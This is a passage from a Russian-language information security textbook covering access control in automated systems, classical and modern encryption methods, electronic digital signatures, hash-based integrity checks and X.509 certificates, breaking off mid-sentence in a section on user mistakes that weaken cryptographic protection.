Разграничение доступа в вычислительной системе заключается в
разделении информации, циркулирующей в ней, на части и организации доступа к ней должностных лиц в соответствии с их функциональными обязанностями и полномочиями. Задача разграничения доступа: сокращение количества должностных лиц, не имеющих к ней отношения при выполнении своих функций, т. е. защита информации от нарушителя среди допущенного к ней персонала. При этом деление информации может производиться по степени важности, секретности, по функциональному назначению, по докумен- там и т. д. Принимая во внимание, что доступ осуществляется с различных технических средств, начинать разграничение можно путем разграниче- ния доступа к техническим средствам, разместив их в отдельных поме- щениях. Все подготовительные функции технического обслуживания аппаратуры, ее ремонта, профилактики, перезагрузки программного обеспечения и т. д. должны быть технически и организационно отделе- ны от основных задач системы. АС и организация его обслуживания должны быть построены следующим образом:
106 техническое обслуживание АС в процессе эксплуатации должно выполняться отдельным персоналом без доступа к информации, подлежащей защите; перезагрузка программного обеспечения и всякие его изменения должны производиться специально выделенным для этой цели проверенным специалистом; функции обеспечения безопасности информации должны выпол- няться специальным подразделением в организации - владельце АС, вычислительной сети или АС; организация доступа пользователей к памяти АС обеспечивала возможность разграничения доступа к информации, хранящейся в ней, с достаточной степенью детализации и в соответствии с за- данными уровнями полномочий пользователей; регистрация и документирование технологической и оперативной информации должны быть разделены. Разграничение доступа пользователей - потребителей АС может осуществляться также по следующим параметрам: по виду, характеру, назначению, степени важности и секретности информации; по способам ее обработки: считать, записать, внести изменения, выполнить команду; по условному номеру терминала; по времени обработки и др. Принципиальная возможность разграничения по указанным пара- метрам должна быть обеспечена проектом АС. А конкретное разграни- чение при эксплуатации АС устанавливается потребителем и вводится в систему его подразделением, отвечающим за безопасность информации. В указанных целях при проектировании базового вычислительного комплекса для построения АС производятся: - разработка операционной системы с возможностью реализации разграничения доступа к информации, хранящейся в памяти ВК; - изоляция областей доступа; - разделение базы данных на группы; - процедуры контроля перечисленных функций. При проектировании АС и информационной системы АС (сети) на их базе производятся: - разработка и реализация функциональных задач по разграничению и контролю доступа к аппаратуре и информации как в рамках дан- ного АС, так и АС (сети) в целом;
107 - разработка аппаратных средств идентификации и аутентификации пользователя; - разработка программных средств контроля и управления разгра- ничением доступа; - разработка отдельной эксплуатационной документации на сред- ства идентификации, аутентификации, разграничения и контроля доступа. В качестве идентификаторов личности для реализации разграниче- ния широко распространено применение кодов паролей, которые хра- нятся в памяти пользователя и АС. В помощь пользователю в системах с повышенными требованиями большие значения кодов паролей записы- ваются на специальные носители - электронные ключи или карточки.
108 3. КРИПТОГРАФИЧЕСКИЕ МЕТОДЫ И СРЕДСТВА ЗАЩИТЫ ИНФОРМАЦИИ 3.1. Основные понятия криптографического преобразо- вания информации С появлением письменности в человеческом обществе появилась потребность в обмене письмами и сообщениями, что, в свою очередь, вызвало необходимость сокрытия содержимого письменных сообщений от посторонних. Среди методов сокрытия содержимого письменных со- общений можно выделить три группы. К первой группе относятся методы маскировки, которые осуществ- ляют сокрытие самого факта наличия сообщения, например, с помощью симпатических чернил. Вторую группу составляют различные методы тайнописи или криптографии (от греческих слов kryptos - тайный и grapho - пишу). Эти методы применяются для изменения сообщения с целью сделать текст непонятным для непосвященных. С развитием науки и техники стали применяться методы третьей группы, которые ориентированы на создание специальных технических устройств, например, инвертирования речи. Далее будем рассматривать только методы второй группы, а именно - методы криптографии. Метод криптографии можно определить как некоторое множество отображений одного пространства (пространства возможных сообще- ний) в другое пространство (пространство возможных криптограмм). Каждое конкретное отображение из этого множества соответствует шифрованию при помощи конкретного ключа. Дадим определения этих понятий. Сообщение, текст которого необходимо сделать непонятным для посторонних, будем называть исходным сообщением или открытым текстом. Шифрование данных - процесс преобразования открытых данных в зашифрованные данные (шифртекст, криптограмму) при помощи шиф- ра. Иногда этот процесс называют зашифрованием данных. Шифр - совокупность обратимых преобразований множества воз- можных открытых данных во множество возможных шифртекстов, осу- ществляемых по определенным правилам с применением ключей.
109 Ключ - конкретное секретное состояние некоторого параметра (па- раметров), обеспечивающее выбор одного преобразования из совокуп- ности возможных для используемого метода шифрования. Различные методы шифрования применялись еще в древности. До наших дней дошли зашифрованные записи, высеченные на гробницах в Египте. До наших дней также дошли арабские шифры IX века, материалы венецианской школы криптографии эпохи Возрождения и многое другое. Практически одновременно с криптографией стал развиваться и криптоанализ - наука о раскрытии шифров (ключей) по шифртексту. Вторая мировая война дала новый толчок развитию криптографии и криптоанализа, что было вызвано применением технических средств связи и боевого управления. Для разработки новых шифров и работы в качестве криптоаналитиков привлекались ведущие ученые. В годы Вто- рой мировой войны был разработан ряд механических устройств для шифрования сообщений. В 1949 году была опубликована статья Клода Шеннона "Теория связи в секретных системах", которая определила научную базу крипто- графии и криптоанализа. С этого времени стали говорить о новой науке КРИПТОЛОГИИ (от греческого kryptos - тайный и logos - сообщение), - науке о преобразовании информации для обеспечения ее секретности. Как известно, до недавнего времени криптографические средства ис- пользовались преимущественно для сохранения государственной тайны, поэтому эти средства разрабатывались специальными органами. При этом использовались криптосистемы очень высокой стойкости, что, естествен- но, сопряжено было с большими затратами. В настоящее время с появле- нием АС сфера защиты информации быстро расширяется. Поэтому в по- следние годы интенсивно разрабатываются новые способы и средства криптографического преобразования данных, которые находят примене- ние для сохранения различных видов секретов и в различных условиях. Криптографические методы защиты информации в автоматизиро- ванных системах могут применяться для защиты информации, обраба- тываемой в ЭВМ и для закрытия информации, передаваемой по линиям связи. Поэтому криптографические методы могут использоваться как внутри отдельных устройств или звеньев системы, так и на различных участках линий связи. Известны различные подходы к классификации методов крипто- графического преобразования информации. По виду воздействия на ис- ходную информацию методы криптографического преобразования ин- формации могут быть разделены на четыре группы (рис.17.)
110 Процесс шифрования заключается в проведении обратимых мате- матических, логических, комбинаторных и других преобразований ис- ходной информации, в результате которых зашифрованная информация представляет собой хаотический набор букв, цифр, других символов и двоичных кодов.
Рис. 17. Классификация методов криптографического преобра-
зования информации Для шифрования информации используются алгоритм преобразо- вания и ключ. Как правило, алгоритм для определенного метода шифро- вания является неизменным. Исходными данными для алгоритма шиф- рования служат информация, подлежащая зашифрованию, и ключ шиф- рования. Ключ содержит управляющую информацию, которая определя- ет выбор преобразования на определенных шагах алгоритма и величины операндов, используемые при реализации алгоритма шифрования. В отличие от других методов криптографического преобразования информации, методы стеганографии позволяют скрыть не только смысл хранящейся или передаваемой информации, но и сам факт хране- ния или передачи закрытой информации. В компьютерных сетях прак- тическое использование стеганографии только начинается, но проведен- ные исследования показывают ее перспективность. В основе всех мето- дов стеганографии лежит маскирование закрытой информации среди от- крытых файлов. Обработка мультимедийных файлов в АС открыла практически неограниченные возможности перед стеганографией. Существует несколько методов скрытой передачи информации. Графическая и звуковая информация представляются в числовом виде. Так в графических объектах наименьший элемент изображения может кодироваться одним байтом. В младшие разряды определенных байтов
111 изображения в соответствии с алгоритмом криптографического преобра- зования помещаются биты скрытого файла. Если правильно подобрать алгоритм преобразования и изображение, на фоне которого помещается скрытый файл, то человеческому глазу практически невозможно отли- чить полученное изображение от исходного. Очень сложно выявить скрытую информацию и с помощью специальных программ. Наилуч- шим образом для внедрения скрытой информации подходят изображе- ния местности, снимки со спутников, самолетов и т. п. С помощью средств стеганографии могут маскироваться текст, изображение, речь, цифровая подпись, зашифрованное сообщение. Комплексное использо- вание стеганографии и шифрования многократно повышает сложность решения задачи обнаружения и раскрытия информации. Содержанием процесса кодирования информации является замена смысловых конструкций исходной информации (слов, предложений) ко- дами. В качестве кодов могут использоваться сочетания букв, цифр, букв и цифр. При кодировании и обратном преобразовании используют- ся специальные таблицы или словари. Кодирование информации целе- сообразно применять в системах с ограниченным набором смысловых конструкций. Такой вид криптографического преобразования применим, например, в командных линиях АС. Недостатками кодирования конфи- денциальной информации является необходимость хранения и распро- странения кодировочных таблиц, которые необходимо часто менять, чтобы избежать раскрытия кодов статистическими методами обработки перехваченных сообщений. Сжатие информации может быть отнесено к методам криптографи- ческого преобразования информации с определенными оговорками. Це- лью сжатия является сокращение объема информации. В то же время, сжатая информация не может быть прочитана или использована без об- ратного преобразования. Учитывая доступность средств сжатия и обрат- ного преобразования, эти методы нельзя рассматривать как надежные средства криптографического преобразования информации. Даже если держать в секрете алгоритмы, то они могут быть сравнительно легко раскрыты статистическими методами обработки. Поэтому сжатые фай- лы конфиденциальной информации подвергаются последующему шиф- рованию. Для сокращения времени целесообразно совмещать процесс сжатия и шифрования информации. В настоящее время разработано большое количество различных ме- тодов шифрования, созданы теоретические и практические основы их применения. Подавляющее число этих методов может быть успешно ис-
112 пользовано и для закрытия информации в АС. Наличие в составе таких систем быстродействующих процессоров и запоминающих устройств большого объема значительно расширяет возможности криптографиче- ского закрытия. Однако для того, чтобы криптографическое преобразование обес- печивало эффективную защиту информации в АС, оно должно удовле- творять ряду требований. Эти требования были выработаны в процессе практического применения криптографии, часть их основана на техни- ко-экономических соображениях. В сжатом виде их можно сформулиро- вать следующим образом: сложность и стойкость криптографического закрытия должны вы- бираться в зависимости от объема и степени секретности данных; надежность закрытия должна быть такой, чтобы секретность не нарушалась даже в том случае, когда злоумышленнику становится известен метод закрытия; метод закрытия, набор используемых ключей и механизм их рас- пределения не должны быть слишком сложными, так как в про- тивном случае потребуются большие затраты вычислительных и временных ресурсов; выполнение процедур прямого и обратного преобразований должно быть формальным. Эти процедуры не должны зависеть от длины сообщений; ошибки, возникающие в процессе выполнения преобразования, не должны распространяться по системе; вносимая процедурами защиты избыточность в массивы хранимых и обрабатываемых данных должна быть минимальной. Для преобразования (шифрования) информации обычно использу- ется некоторый алгоритм или устройство, реализующее заданный алго- ритм, которые могут быть известны широкому кругу лиц. Управление процессом шифрования осуществляется с помощью периодически ме- няющегося кода ключа, обеспечивающего каждый раз оригинальное представление информации при использовании одного и того же алго- ритма или устройства. Знание ключа позволяет просто и надежно рас- шифровать текст. Однако без знания ключа эта процедура может быть практически невыполнима даже при известном алгоритме шифрования. Даже простое преобразование информации является весьма эффек- тивным средством, дающим возможность скрыть ее смысл от большин- ства неквалифицированных нарушителей. Структурная схема шифрования информации представлена на рис. 18.
113 Рис. 18. Шифрование информации Для построения средств защиты от НСД необходимо иметь пред- ставление о методах криптографии. Их классификация приведена на рис. 19, любой ключ из множества возможных должен обеспечивать надеж- ную защиту информации, алгоритм должен допускать как программную, так и аппаратную реализацию[4].
Рис. 19. Классификация методов криптографии
Сам процесс криптографического закрытия данных может осу- ществляться как программно, так и аппаратно, однако аппаратная реали-
114 зация обладает рядом преимуществ, главным из которых является высо- кая производительность. Сформулирована следующая система требований к алгоритму шифрования: зашифрованный текст должен поддаваться чтению только при наличии ключа шифрования, число операций для определения использованного ключа шифро- вания по фрагменту шифрованного текста и соответствующему ему открытого текста, должно быть не меньше общего числа воз- можных ключей, знание алгоритма шифрования не должно влиять на надежность защиты, незначительные изменения ключа шифрования должны приводить к существенному изменению вида зашифрованного текста, незначительные изменения шифруемого текста должны приводить к существенному изменению вида зашифрованного текста даже при использовании одного и того же ключа, длина шифрованного текста должна быть равна длине исходного текста, любой ключ из множества возможных должен обеспечи- вать надежную защиту информации, алгоритм должен допускать как программную, так и аппаратную реализацию[20].
3.1.1. Основные методы шифрования
Чаще всего в криптографии используются две простые формы
шифрования - подстановка и перестановка. В основе метода подстановки лежит принцип кодировочной табли- цы. Простейшие методы подстановки применялись еще в Древнем Риме - Юлий Цезарь переписывался со своими корреспондентами, заменяя каждую букву текста на букву, стоящую в алфавите на три позиции по- зади. Например, если мы таким способом зашифруем слова ЗАЩИТАИНФОРМАЦИИ то получим КГЬЛХГЛРЧСУПГЩЛЛ, то есть, вроде бы, бессмысленный набор символов, разобрать кото- рый сложно. К сожалению, при достаточно длинных текстах такого рода шифры очень просто "раскалываются" методом частотного анализа, ис- пользующего данные о частоте встречаемости букв в определенном язы-
115 ке. Есть и другие методы анализа текстов, закрытых таким способом - вспомним хотя бы рассказ Конан Дойля "Пляшущие человечки". При использовании метода перестановок текст разбивается на бло- ки фиксированной длины, внутри каждого из которых символы меняют- ся местами по определенному правилу. Ключом при этом является по- следовательность цифр, указывающая способ перестановки символов. Например, разобьем слова ЗАЩИТАДАННЫХОТУТЕЧКИ на 4 группы по 5 символов ЗАЩИТ АДАНН ЫХОТУ ТЕЧКИ и переставим буквы в каждой группе в соответствии с ключом 1-3- 5-2-4. Получим (после удаления пробелов) текст ЗЩТАИААНДНЫОУХТТЧИЕК. На практике возможно совместное использование подстановок и перестановок, что несколько повышает криптостойкость шифра. Методы подстановки получили новый импульс после того, как в 1917 г. Г.С.Вернам опубликовал замечательную систему побитового шифрования открытого текста, представленного в телеграфном коде Бо- до. Каждый бит при этом преобразуется с помощью нового бита ключа по правилу "сложение по модулю 2" или "исключающее или" (XOR): 0 XOR 0 = 0; 0 XOR 1 = 1; 1 XOR 0 = 1; 1 XOR 1 = 0. Если защищаемая нами информация представлена в виде последо- вательности бит (как, например, при записи текста в памяти ЭВМ в стандартной кодировке ASCII), то, "накладывая" на эту информацию гамму шифра, мы легко получим зашифрованный текст. Расшифровка при этом осуществляется повторным наложением той же гаммы, что весьма удобно. Если ключ (гамму) использовать только один раз и при этом длина гаммы соответствует длине шифруемого текста, то мы полу- чаем, как показал К.Шеннон, действительно не раскрываемый шифр. Иногда применительно к такой схеме употребляется термин "линейное шифрование". Чтобы получить линейные последовательности элементов гаммы, длина которых превышает размер шифруемых данных, используют дат- чики псевдослучайных числе (ПСЧ). На основе математической теории групп было разработано несколько типов таких датчиков. В настоящее время наиболее эффективными являются так называе- мые конгруэнтные генераторы ПСЧ, в которых каждое последующее ПСЧ получается из предыдущего с помощью специального преобразо-
116 вания. Типичным примером является линейный конгруэнтный датчик, который вырабатывает последовательности псевдослучайных чисел T(i), описываемые соотношением: T(i+1) = ( A * T(i) + C ) mod M, (1) где A и С - константы, Т(0) -исходная величина, выбранная в каче- стве порождающего числа. Такой датчик генерирует ПСЧ с определенным периодом повторе- ния, зависящим от выбранных значений А и С. Значение М обычно вы- бирается равным 2^b, где b - длина слова ЭВМ, на которой реализован датчик, в битах. Датчик имеет максимальный период М до того, как ге- нерируемая последовательность начнет повторяться. Как показал Д.Кнут, линейный конгруэнтный датчик ПСЧ имеет максимальную дли- ну М тогда и только тогда, когда С - нечетное и A mod 4 = 1. Это означа- ет, что для 16-битовой ЭВМ период датчика будет равен 2 в 16 степени, т.е. 65536. Если сравнить это число с количеством символов на стан- дартной книжной странице, то получим, что таким датчиком можно "га- рантировано" закрыть (до смены ключа) примерно 24 страницы текста. После этого можно менять значения А, С, Т(0) и повторять все сначала. Следует, однако, отметить одну неприятную особенность, связан- ную с зашифрованием документов, содержащих общеизвестную стан- дартную информацию, например, наименования реквизитов, гриф сек- ретности, адрес и т.п. Предполагая, что в начале дешифруемого текста находится известная стандартная информация, можно "вскрыть" исполь- зуемый датчик. Это становится возможным потому, что алгоритм шиф- рования не зависит ни от длины шифруемого файла, ни от его содержа- ния. Для повышения криптостойкости таких шифров предложен целый ряд методов, например - метод гаммирования с обратной связью, кото- рый заключается в том, что для получения сегмента гаммы в качестве порождающего числа используется контрольная сумма определенного участка шифруемых данных. Кроме гаммирования используются и другие системы шифрования.
3.1.2. Системы шифрования с закрытым ключом
Различают два основных метода шифрования: симметричный и
асимметричный. В первом из них один и тот же ключ (хранящийся в секрете) используется и для зашифрования, и для расшифрования дан- ных. Разработаны весьма эффективные (быстрые и надежные) методы симметричного шифрования. Наиболее известным стандартом на сим-
117 метричное шифрование с закрытым ключом является стандарт для обра- ботки информации в государственных учреждениях США DES (Data Encryption Standard). Алгоритм DES использует ключ длиной 56 бит, что требует от злоумышленника перебора 72 квадриллионов возможных ключевых комбинаций. Более криптостойкая (но втрое менее быстро- действующая) версия алгоритма DES — Triple DES позволяет задать ключ длиной 112 бит. Другим популярным алгоритмом шифрования является IDEA (International Data Encryption Algorithm), отличающийся применением ключа длиной 128 бит. Он считается более стойким, чем DES. Отечественный подобный стандарт шифрования данных — ГОСТ 28147-89 “Системы обработки информации. Защита криптографическая. Алгоритм криптографического преобразования” определяет алгоритм симметричного шифрования с ключом длиной до 256 бит. Рис. 20 иллюстрирует использование симметричного шифрования. Для определенности мы будем вести речь о защите сообщений, хотя со- бытия могут развиваться не только в пространстве, но и во времени, ко- гда зашифровываются и расшифровываются никуда не перемещающие- ся файлы. К достоинствам симметричных методов относят высокое быстро- действие и простоту. Основным недостатком симметричного шифрования является то, что секретный ключ должен быть известен и отправителю, и получате- лю. С одной стороны, это создает новую проблему распространения ключей. По существу, в открытых сетях должен быть предусмотрен фи- зически защищенный канал передачи ключей. С другой стороны, полу- чатель на основании наличия зашифрованного и расшифрованного со- общения не может доказать, что он получил это сообщение от конкрет- ного отправителя, поскольку такое же сообщение он мог сгенерировать самостоятельно. Названный недостаток послужил причиной разработки методов шифрования с открытым ключом — асимметричных методов.
118 Рис. 20. Использование симметричного метода шифрования
3.1.3. Системы шифрования с открытым ключом
В настоящее время считается, что наиболее перспективными явля-
ются системы криптографической защиты с открытым ключом. В асимметричных методах используются два ключа. (см. рис. 21). Один ключ является закрытым и известным только получателю. Его ис- пользуют для расшифрования. Второй из ключей является открытым, т.е. он может быть общедоступным по сети и опубликован вместе с ад- ресом пользователя. Его используют для выполнения шифрования. По- нятно, что ключ расшифрования нельзя определить из ключа зашифро- вания. Самым популярным из асимметричных является метод RSA (Рай- вест, Шамир, Адлеман), основанный на операциях с большими (скажем, 100-значными) простыми числами и их произведениями.
119 Рис. 21. Ассиметричные системы шифрования Формально асимметричный метод можно описать следующим об- разом. Обозначим результат шифрования текста T с помощью открытого ключа — E(T), а результат расшифровки текста с помощью закрытого ключа — D(T). Тогда асимметричный метод должен отвечать следую- щим трем требованиям: D(E(T)) = T; (2) D практически невозможно определить по E; Е нельзя взломать. Преимущество указанного метода состоит в уменьшении количе- ства ключей, с которыми приходится оперировать. Однако данный алго- ритм имеет существенный недостаток — требует значительной вычис- лительной мощности. Проиллюстрируем использование асимметричного шифрования (см. рис. 22). Существенным недостатком асимметричных методов шифрования является их низкое быстродействие, поэтому данные методы приходится сочетать с симметричными (асимметричные методы на 3 – 4 порядка медленнее). Так, для решения задачи эффективного шифрования с пере- дачей секретного ключа, использованного отправителем, сообщение сначала симметрично зашифровывают случайным ключом, затем этот ключ зашифровывают открытым асимметричным ключом получателя, после чего сообщение и ключ отправляются по сети.
120 Как отмечалось, основным недостатком асимметричных алгорит- мов является их низкое быстродействие: данные алгоритмы в несколько тысяч раз медленнее симметричных алгоритмов! Поэтому для исключе- ния данного недостатка используют технологии сочетания симметрич- ных и асимметричных методов шифрования. В частности, текст шифру- ется быстродействующим симметричным алгоритмом, а секретный (случайный) ключ, сопровождающий текст, — асимметричным алго- ритмом.
Рис. 22. Использование асимметричного метода шифрования.
Важным преимуществом асимметричных методов является воз- можность идентификации отправителя путем использования его элек- тронной подписи. Идея технологии электронной подписи состоит в сле- дующем. Отправитель передает два экземпляра одного сообщения: от- крытое и расшифрованное его закрытым ключом (т.е. обратно шифро- ванное). Получатель шифрует с помощью открытого ключа отправителя расшифрованный экземпляр. Если он совпадет с открытым вариантом, то личность и подпись отправителя считается установленной. В заключении отметим, что криптографические методы использу- ются также для контроля целостности информации и программ. Для это- го применяется шифрованная контрольная сумма исходного текста (имитоприставка), вычисленная с применением секретного ключа. В от- личии от традиционной контрольной суммы (используемой для защиты от программно-аппаратных сбоев и ошибок), имитоприставка обеспечи- вает практически абсолютную защиту как от непреднамеренной, так и преднамеренной модификации данных или программы.
121 3.2. Архитектура алгоритмов ЭЦП Поскольку подпись под важным документом может иметь далеко идущие последствия, перед подписыванием необходимо предусмотреть определенные меры предосторожности. В случае программной реализа- ции, как правило, секретный ключ подписывающего хранится на его личной дискете, защищенной от копирования. Однако этого бывает не- достаточно, ведь дискету могут похитить или просто потерять. Следова- тельно, необходима защита от несанкционированного доступа к секрет- ной информации (ключу). Естественным решением этой проблемы явля- ется парольная защита. Паролем могут закрываться не только функции (опции) постановки ЭЦП и генерации ключей, но и функций, изменяю- щие содержимое каталога открытых ключей абонентов сети, и др. Необходимо проверить (в случае программной реализации, и осо- бенно это важно для программной реализации на ПЭВМ), чтобы в си- стеме не было "криптовирусов", которые могут нанести существенный вред. Например, в момент подписывания криптовирусы могут перехва- тить секретные ключи (и скопировать их в нужное место). Кроме то го, при проверке подписи они могут заставить систему "сказать", что под- пись верна, хотя она на самом деле неверна. Можно представить себе криптовирус, который, попав в систему лишь один-единственный раз в момент генерации ключей, "поможет" системе сгенерировать слабые ключи. Например, если ключи генерируются на основе датчика случай- ных чисел, который использует встроенный таймер, вирус может изме- нить показания таймера, а потом восстановить "статус-кво". Впослед- ствии эти ключи могут быть легко вскрыты злоумышленниками. Далее этот вирус уже не нужен, он сделал свое дело. Против таких криптови- русов имеется только одна защита – загрузка с чистой системной диске- ты и использование чистого, "родного" программного продукта.
3.2.1. Постановка и проверка подписи
Чтобы поставить ЭЦП под конкретным документом, необходимо
проделать довольно большой объем вычислительной работы. Эти вы- числения разбиваются на два этапа: генерация ключей и подписание до- кумента. Генерация ключей. На этом этапе для каждого абонента генериру- ется пара ключей: секретный и открытый. Секретный ключ хранится абонентом в тайне. Он используется для формирования подписи. От крытый ключ связан с секретным с помощью особого математического
122 соотношения. Открытый ключ известен всем другим пользователям сети и предназначен для проверки подписи. Его следует рассматривать как необходимый инструмент для проверки, позволяющий определить авто- ра подписи и достоверность электронного документа, но не позволяю- щий вычислить секретный ключ. Возможны два варианта проведения этого этапа. Естественным представляется вариант, когда генерацию ключей абонент может осуще- ствить самостоятельно. Не исключено, однако, что в определенных си- туациях эту функцию целесообразно передать центру, который будет вырабатывать пару секретный-открытый ключи для каждого абонента и заниматься их распространением. Второй вариант имеет ряд преиму- ществ административного характера, однако обладает принципиальным недостатком - у абонента нет гарантии, что его личный секретный ключ является уникальным. Другими словами, можно сказать, что здесь все абоненты находятся "под колпаком" центра и центр может подделать любую подпись . Подписание документа. Прежде всего, документ "сжимают" до не- скольких десятков или сотен байт с помощью так называемой хеш- функции. Здесь термин "сжатие" вовсе не аналогичен термину "архива- ция", значение хеш-функции лишь только сложным образом зависит от документа, но не позволяет восстановить сам документ. Эта хеш- функция должна удовлетворять ряду условий: быть чувствительна к всевозможным изменениям в тексте, таким, как вставки, выбросы, перестановки и т.п.; обладать свойством необратимости, т.е. задача подбора документа, который обладал бы требуемым значением хеш-функции, вычислитель- но неразрешима. Вероятность того, что значения хеш-функций двух различных до- кументов (вне зависимости от их длин) совпадут, должна быть ничтожно мала. Ниже будет рассмотрено, какие нападения становятся возможными, если пренебречь хотя бы одним из перечисленных выше условий. Далее к полученному значению хеш-функции применяют то или иное математическое преобразование (в зависимости от выбранного ал- горитма ЭЦП) и получают собственно подпись документа. Эта подпись может иметь вполне читаемый, "буквенный" вид, но зачастую ее пред- ставляют в виде последовательности произвольных "нечитаемых" сим волов. ЭЦП может храниться вместе с документом, например, стоять в его начале или конце, либо в отдельном файле. Естественно, в послед
123 нем случае при проверке подписи необходимо располагать как самим документом, так и файлом, содержащим его подпись. Проверка подписи. При проверке подписи проверяющий должен располагать открытым ключом абонента, поставившего подпись. Этот ключ должен быть аутентифицирован, то есть проверяющий должен быть полностью уверен, что данный открытый ключ соответствует тому абоненту, который выдает себя за его "хозяина". В случае, когда абонен- ты самостоятельно обмениваются ключами, эта уверенность может под- крепляться связью по телефону, личным контактом или любым другим способом. В случае, когда абоненты действуют в сети с выделенным центром, открытые ключи абонентов подписываются (сертифицируют- ся) центром, и непосредственный контакт абонентов между собой (при передаче или подтверждении подлинности ключей) заменяется на кон такт каждого из них в отдельности с центром. Процедура проверки ЭЦП состоит из двух этапов: вычисления хеш- функции документа и собственно математических вычислений, преду- смотренных в данном алгоритме подписи. Последние заключаются в проверке того или иного соотношения, связывающего хеш-функцию до- кумента, подпись под этим документом и открытый ключ подписавшего абонента. Если рассматриваемое соотношение оказывается выполнен- ным, то подпись признается правильной, а сам документ– подлинным, в противоположном случае документ считается измененным, а подпись под ним – недействительной.
3.2.2. Контроль целостности
Криптографические методы позволяют надежно контролировать
целостность как отдельных порций данных, так и их наборов (таких как поток сообщений); определять подлинность источника данных; гаранти- ровать невозможность отказаться от совершенных действий ("неотказу- емость"). В основе криптографического контроля целостности лежат два по- нятия: хэш-функция; электронная цифровая подпись (ЭЦП). Хэш-функция – это труднообратимое преобразование данных (од- носторонняя функция), реализуемое, как правило, средствами симмет- ричного шифрования со связыванием блоков. Результат шифрования по- следнего блока (зависящий от всех предыдущих) и служит результатом хэш-функции.
124 Пусть имеются данные, целостность которых нужно проверить, хэш-функция и ранее вычисленный результат ее применения к исход- ным данным (так называемый дайджест). Обозначим хэш-функцию че- рез h, исходные данные – через T, проверяемые данные – через T'. Кон- троль целостности данных сводится к проверке равенства h(T') = h(T). Если оно выполнено, считается, что T' = T. Совпадение дайджестов для различных данных называется коллизией. В принципе, коллизии, конеч- но, возможны, поскольку мощность множества дайджестов меньше, чем мощность множества хэшируемых данных, однако то, что h есть функ- ция односторонняя, означает, что за приемлемое время специально ор- ганизовать коллизию невозможно. Рассмотрим теперь применение асимметричного шифрования для выработки и проверки электронной цифровой подписи. Пусть E(T) обозначает результат зашифрования текста T с помощью открытого клю- ча, а D(T) – результат расшифрования текста Т (как правило, шифрован- ного) с помощью секретного ключа. Чтобы асимметричный метод мог применяться для реализации ЭЦП, необходимо выполнение тождества E(D(T))=D(E(T))=T (3)
На рис. 23. показана процедура выработки электронной цифровой
подписи, состоящая в шифровании преобразованием D дайджеста h(T).
Рис. 23. Выработка электронной цифровой подписи.
Проверка ЭЦП может быть реализована так, как показано на рис. 24. Из равенства E(S') = h(T'), (4) следует, что S' = D(h(T') (для доказательства достаточно применить к обеим частям преобразование D и вычеркнуть в левой части тожде-
125 ственное преобразование D(E())). Таким образом, электронная цифровая подпись защищает целостность сообщения и удостоверяет личность от- правителя, то есть защищает целостность источника данных и служит основой неотказуемости.
Рис. 24. Проверка электронной цифровой подписи
Два российских стандарта, ГОСТ Р 34.10-94 "Процедуры выработки и проверки электронной цифровой подписи на базе асимметричного криптографического алгоритма" и ГОСТ Р 34.11-94 "Функция хэширо- вания", объединенные общим заголовком "Информационная технология. Криптографическая защита информации", регламентируют вычисление дайджеста и реализацию ЭЦП. В сентябре 2001 года был утвержден, а 1 июля 2002 года вступил в силу новый стандарт ЭЦП – ГОСТ Р 34.10- 2001, разработанный специалистами ФАПСИ. Для контроля целостности последовательности сообщений (то есть для защиты от кражи, дублирования и переупорядочения сообщений) применяют временные штампы и нумерацию элементов последователь- ности, при этом штампы и номера включают в подписываемый текст. Цифровые сертификаты При использовании асимметричных методов шифрования (и, в частности, электронной цифровой подписи) необходимо иметь гарантию подлинности пары (имя пользователя, открытый ключ пользователя). Для решения этой задачи в спецификациях X.509 вводятся понятия цифрового сертификата и удостоверяющего центра. Удостоверяющий центр – это компонент глобальной службы ка- талогов, отвечающий за управление криптографическими ключами пользователей. Открытые ключи и другая информация о пользователях хранится удостоверяющими центрами в виде цифровых сертификатов, имеющих следующую структуру:
126 порядковый номер сертификата; идентификатор алгоритма электронной подписи; имя удостоверяющего центра; срок годности; имя владельца сертификата (имя пользователя, которому принад- лежит сертификат); открытые ключи владельца сертификата (ключей может быть не- сколько); идентификаторы алгоритмов, ассоциированных с открытыми ключами владельца сертификата; электронная подпись, сгенерированная с использованием секрет- ного ключа удостоверяющего центра (подписывается результат хэширования всей информации, хранящейся в сертификате). Цифровые сертификаты обладают следующими свойствами: любой пользователь, знающий открытый ключ удостоверяющего центра, может узнать открытые ключи других клиентов центра и проверить целостность сертификата; никто, кроме удостоверяющего центра, не может модифициро- вать информацию о пользователе без нарушения целостности сертификата. В спецификациях X.509 не описывается конкретная процедура ге- нерации криптографических ключей и управления ими, однако даются некоторые общие рекомендации. В частности, оговаривается, что пары ключей могут порождаться любым из следующих способов. ключи может генерировать сам пользователь. В таком случае секретный ключ не попадает в руки третьих лиц, однако нужно решать задачу безопасной связи с удостоверяющим центром; ключи генерирует доверенное лицо. В таком случае приходится решать задачи безопасной доставки секретного ключа владельцу и предоставления доверенных данных для создания сертификата; ключи генерируются удостоверяющим центром. В таком случае остается только задача безопасной передачи ключей владельцу. Цифровые сертификаты в формате X.509 версии 3 стали не только формальным, но и фактическим стандартом, поддерживаемым много- численными удостоверяющими центрами.
3.2.3. Криптографические методы защиты
Возможность использования персональных компьютеров в локаль-
ных сетях (при сопряжении их с другими ПК) или применение "моде-
127 мов" для обмена информацией по телефонным проводам предъявляет более жесткие требования к программному обеспечению по защите ин- формации ПК. Потребители ПК в различных организациях для обмена информацией все шире используют электронную почту, которая без до- полнительных средств защиты может стать достоянием посторонних лиц. Самой надежной защитой от несанкционированного доступа к пе- редаваемой информации и программным продуктам ПК является при- менение различных методов шифрования (криптографических методов защиты информации). Криптографический метод защиты, безусловно, самый надежный метод защиты, так как охраняется непосредственно сама информация, а не доступ к ней (например, зашифрованный файл нельзя прочесть даже в случае кражи носителя). Данный метод защиты реализуется в виде программ или пакетов программ, расширяющих возможности стандарт- ной операционной системы. Защита на уровне операционной системы, чаще всего, должна дополняться средствами защиты на уровне систем управления базами данных, которые позволяют реализовывать сложные процедуры управления доступом. Подробно методы и способы криптографического преобразования данных рассмотрены в предыдущем разделе. Здесь же отметим, что пользователь ПК должен помнить о том, что эффективность этих мето- дов и средств может быть снижена до минимума неправильными дей- ствиями самого пользователя ПК. 1) Самая простая атака может быть осуществлена, если пользователь оставит где-нибудь записанный пароль, защищающий закрытый ключ. Если злоумышленник получит его, а затем получит доступ к файлу с закрытым ключом, он сможет читать адресованные пользо- вателю зашифрованные сообщения и ставить от его имени цифро- вую подпись. Всегда необходимо пользоваться рекомендациями по правиль- ному выбору паролей. 2) Еще одна потенциальная проблема безопасности связана со спосо- бом, которым большинство операционных систем удаляет файлы. Когда пользователь шифрует файл и затем удаляет файл с исход- ным открытым 